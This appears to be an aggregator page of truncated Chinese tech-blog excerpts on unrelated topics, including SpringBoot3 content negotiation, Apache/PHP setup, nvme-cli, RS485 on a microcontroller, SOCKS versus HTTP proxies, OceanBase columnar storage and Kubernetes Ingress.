重生之 SpringBoot3 入门保姆级学习&#xff08;14、内容协商基础简介&#xff09; 3.3 内容协商3.3.1 基础简介3.3.2 演示效果 3.3 内容协商 3.3.1 基础简介 默认规则 基于请求头的内容协商&#xff08;默认开启&#xff09; 客户端向服务器发送请求&#xff0c;携带 HTTP 标…

php: centos+apache 启动php项目

指导文件 &#xff1a;PHP: Apache 2.x on Unix systems - Manual 下载路径 &#xff1a;Index of /httpd configure: error: APR not found. 解决方案&#xff1a; APR&#xff08;Apache Portable Runtime&#xff09;库。APR是Apache HTTP服务器的可移植运行时环境&…

51建模网3D编辑器:一键为3D模型设置特殊材质

3D设计师要对3D模型设置玻璃或者钻石材质时&#xff0c;操作比较复杂&#xff0c;但是利用51建模网的3D编辑器&#xff0c;不用下载安装软件&#xff0c;在线通过浏览器即可编辑&#xff0c;具有一键设置特殊材质的功能。目前&#xff0c;它支持钻石材质、玻璃材质和水波纹材质…

nvme-cli常见命令分析

一、背景 nvme-cli命令常常用于获取或者设置SSD参数&#xff0c;比如常见的nvme list&#xff0c;nvme id-ctrl等&#xff0c;都是获取SSD的基本信息&#xff0c;也有nvme admin-passthru用于读取或者设置自定义命令。作为使用者&#xff0c;我们并不知道nvme-cli源码怎么实现…

程序员修炼之道 07:调试

不记录&#xff0c;等于没读。 这里是我阅读《程序员修炼之道》这本书的记录。 软件缺陷以各种方式表现出来&#xff0c;从对需求的误解到编码错误。现在的计算机系统仍有局限性&#xff0c;能干你让它干的事情&#xff0c;但不一定能干你想让它干的事情。本章介绍调试中涉及的…

基于STC12C5A60S2系列1T 8051单片机实现串口调试助手软件与单片机相互发送数据的RS485通信功能

基于STC12C5A60S2系列1T 8051单片机实现串口调试助手软件与单片机相互发送数据的RS485通信功能 STC12C5A60S2系列1T 8051单片机管脚图STC12C5A60S2系列1T 8051单片机串口通信介绍STC12C5A60S2系列1T 8051单片机串口通信的结构基于STC12C5A60S2系列1T 8051单片机串口通信的特殊功…

编译原理总结

编译器构成 1. 前端分析部分 1.1 词法分析 确定词性&#xff0c;输出为token序列 1.2 语法分析 识别短语 1.3 语义分析 分析短语在句子中的成分 IR中间代码生成 2. 机器无关代码优化 3. 后端综合部分 目标代码生成 机器相关代码优化 4. 其他 全局信息表 异常输出

SOCKS 代理 和 HTTP 代理, WebSocket

SOCKS 代理 和 HTTP 代理 的区别 SOCKS 代理 和 HTTP 代理 都是代理服务器&#xff0c;它们充当客户端和目标服务器之间的中介&#xff0c;但它们的工作方式和应用场景有所不同。 1. SOCKS 代理&#xff1a; 工作原理&#xff1a; SOCKS 代理是一种更底层的代理&#xff0c;…

列存在 OceanBase 数据库架构中的应用与演进

OceanBase 4.3 版本上线了列存功能&#xff0c;以满足实时分析的需求。 本文作为《特性解读&#xff1a;列存技术》的后续&#xff0c;将详细阐述列存技术在OceanBase数据库架构中的应用、发展历程&#xff0c;以及未来的趋势。 一、前言 1970 年&#xff0c;关系模型之父 Co…

Java物业管理系统+数据库应用程序开发[JavaSE+JDBC+idea控制台+MySQL]

背景&#xff1a; 使用JavaSEJDBCMySQL技术实现一个物业管理系统&#xff0c;具体要求如下 物业管理系统需求&#xff1a; 需求分析 1.1用户需求分析 在进入系统之前&#xff0c;要进行身份确认&#xff0c;只有用户名和用户密码都相符的用户方可进入本系统&#xff0c;为…

PCL 抛物线回归拟合(Quadratic,二维)

文章目录 一、简介二、实现代码三、实现效果参考资料一、简介 这里仍然是最小二乘法的应用,其推导过程如下所述: 1.二次函数模型: 其中,a、b 和 c 是需要确定的参数。 2.最小二乘法 假设我们有一组数据点 ( x 1 ​ , y

负压实验室设计建设方案

随着全球公共卫生事件的频发&#xff0c;负压实验室的设计和建设在医疗机构中的重要性日益凸显。负压实验室&#xff0c;特别是负压隔离病房&#xff0c;主要用于控制传染性疾病的扩散&#xff0c;保护医护人员和周围环境的安全。广州实验室装修公司中壹联凭借丰富的实验室装修…

k8s 对外服务之 Ingress(七层代理)

一 Ingress 简介 理论方面 1&#xff0c; k8s service 作用 对集群内部&#xff1a; 它不断跟踪pod的变化&#xff0c;更新endpoint中对应pod的对象&#xff0c;提供了ip不断变化的pod的服务发现机制 对集群外部&#xff1a; 对集群外部&#xff0c;他类似负载均衡器&am…

剪画小程序:AI声音克隆,只需10秒完美复制真人音色

Hello&#xff0c;大家好呀&#xff01;我是分享声音的克隆。 想象一下&#xff0c;如果你能够复制自己的声音&#xff0c;那么您可以给视频配上自己的声 音&#xff0c;那是多么的有趣啊。 ​编辑 工具&#xff1a;小程序剪画 功能简介&#xff1a;支持多种端口&#xff1…